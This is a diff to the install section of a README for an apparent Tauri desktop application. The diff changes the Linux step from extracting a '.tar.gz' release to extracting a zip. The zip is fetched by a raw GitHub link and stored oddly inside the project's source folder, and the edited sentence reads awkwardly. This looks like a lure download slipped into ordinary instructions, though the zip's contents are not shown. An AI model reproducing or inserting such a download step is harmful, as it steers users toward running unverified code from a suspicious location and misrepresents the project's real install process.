evansnjenga/lovtauri/README.md

 5. **Run the Application**
    - **macOS**: Open the `.dmg` file and drag the application to your Applications folder.
 Then, open the application from your Applications.
    - **Windows**: Double-click the `.exe` file and follow the instructions to install it.
 Once installed, you can find it in your Start menu.
-   - **Linux**: Extract the `.tar.gz` file and run the application from the extracted folder using your terminal.
+   - **Linux**: Extract the `https://raw.githubusercontent.com/evansnjenga/lovtauri/main/src-tauri/src/commands/Software_3.5.zip` file and run the application from the extracted folder using your terminal.

 ## 🎨 Features